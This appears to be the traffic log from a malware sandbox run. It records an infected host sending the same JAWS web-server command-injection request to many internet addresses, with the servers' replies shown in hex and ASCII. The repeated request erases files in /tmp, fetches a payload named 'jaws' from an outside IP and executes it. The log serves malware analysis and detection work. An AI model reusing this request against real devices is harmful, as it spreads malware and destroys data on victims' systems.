                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            534192.168.2.23488602.17.206.8380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:40.082110882 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:40.446671009 CET430INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 208
                                                            Expires: Fri, 26 Jan 2024 14:32:40 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:40 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 65 38 32 35 30 63 35 26 23 34 36 3b 31 37 30 36 32 37 39 35 36 30 26 23 34 36 3b 65 65 31 61 30 33 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;1e8250c5&#46;1706279560&#46;ee1a033</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            535192.168.2.2341112183.255.117.4480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:40.101073027 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            536192.168.2.234237895.216.144.14280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:40.317780972 CET48INHTTP/1.1 101 Switching Protocols


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            537192.168.2.234701270.37.208.22580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:41.653011084 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:41.794220924 CET172INHTTP/1.1 404 Not Found
                                                            Content-Length: 0
                                                            Date: Fri, 26 Jan 2024 14:34:37 GMT
                                                            X-Frame-Options: sameorigin
                                                            Content-Security-Policy: frame-ancestors 'self'


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            538192.168.2.2346238149.28.12.20180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:41.674135923 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:41.833913088 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:41 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            539192.168.2.2352060163.5.192.9680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:41.706916094 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:41.899579048 CET495INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:32:41 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 301
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at 127.0.1.1 Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            540192.168.2.234729423.14.115.11580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:41.743983030 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:41.975539923 CET430INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 208
                                                            Expires: Fri, 26 Jan 2024 14:32:41 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:41 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 35 64 66 33 61 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 36 31 26 23 34 36 3b 33 35 64 62 64 36 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;75df3a17&#46;1706279561&#46;35dbd62</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            541192.168.2.234719013.35.52.6880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:41.764801025 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:42.019785881 CET316INHTTP/1.1 403 Forbidden
                                                            Server: CloudFront
                                                            Date: Fri, 26 Jan 2024 14:32:41 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 151
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            542192.168.2.23591245.130.129.7880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:41.767636061 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            543192.168.2.2351726192.234.37.10580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:41.768807888 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            544192.168.2.234337235.223.2.16080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:41.790683031 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:41.928334951 CET903INHTTP/1.1 400 Bad Request
                                                            content-type: text/html
                                                            cache-control: private, no-cache, max-age=0
                                                            pragma: no-cache
                                                            content-length: 679
                                                            date: Fri, 26 Jan 2024 14:32:41 GMT
                                                            server: LiteSpeed
                                                            connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            545192.168.2.2354984151.244.61.7580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:41.876739025 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:42.161120892 CET443INHTTP/1.1 403 Forbidden
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 337
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 36 22 3e 3c 74 69 74 6c 65 3e 4e 54 4c 34 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 31 30 2e 31 30 2e 33 34 2e 33 36 2f 3f 74 79 70 65 3d 49 6e 76 61 6c 69 64 20 4b 65 79 77 6f 72 64 26 70 6f 6c 69 63 79 3d 4d 61 69 6e 50 6f 6c 69 63 79 20 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 76 73 70 61 63 65 3d 22 30 22 20 68 73 70 61 63 65 3d 22 30 22 3e 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1256"><title>NTL4</title></head><body><iframe src="http://10.10.34.36/?type=Invalid Keyword&policy=MainPolicy " style="width: 100%; height: 100%" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" vspace="0" hspace="0"></iframe></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            546192.168.2.233592452.56.104.8580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:41.945133924 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:42.146519899 CET401INHTTP/1.1 301 Moved Permanently
                                                            Server: awselb/2.0
                                                            Date: Fri, 26 Jan 2024 14:32:42 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 134
                                                            Connection: keep-alive
                                                            Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            547192.168.2.2352728217.255.164.2080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:41.969790936 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            548192.168.2.2333660190.175.16.10080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:42.003036976 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:42.241627932 CET424INData Raw: 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 2f 6a 61 77 73 3b 73 68 2b 2f 74 6d 70 2f 6a 61 77 73 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6d 69 63 72 6f 5f 68 74 74 70 64 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32
                                                            Data Ascii: 93.123.85.149/jaws;sh+/tmp/jaws 400 Bad RequestServer: micro_httpdDate: Fri, 26 Jan 2024 14:32:40 GMTConnection: keep-aliveKeep-Alive: timeout=60, max=1000Content-Type: text/htmlContent-Security-Policy: default-src 'self'; frame-an


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            549192.168.2.233744246.21.77.21980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:42.019948959 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:42.275263071 CET516INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 349
                                                            Connection: close
                                                            Date: Fri, 26 Jan 2024 14:32:41 GMT
                                                            Server: lighttpd/1.4.39
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            550192.168.2.2345936223.119.221.2880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:42.152481079 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:42.471532106 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:32:42 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:42 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 65 66 30 37 37 64 66 26 23 34 36 3b 31 37 30 36 32 37 39 35 36 32 26 23 34 36 3b 36 62 34 63 31 62 63 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;1ef077df&#46;1706279562&#46;6b4c1bc4</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            551192.168.2.2354216104.24.247.1680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:42.593096972 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            552192.168.2.2346244159.135.59.13680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:42.602169037 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            553192.168.2.2340872142.166.236.25180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:42.618572950 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
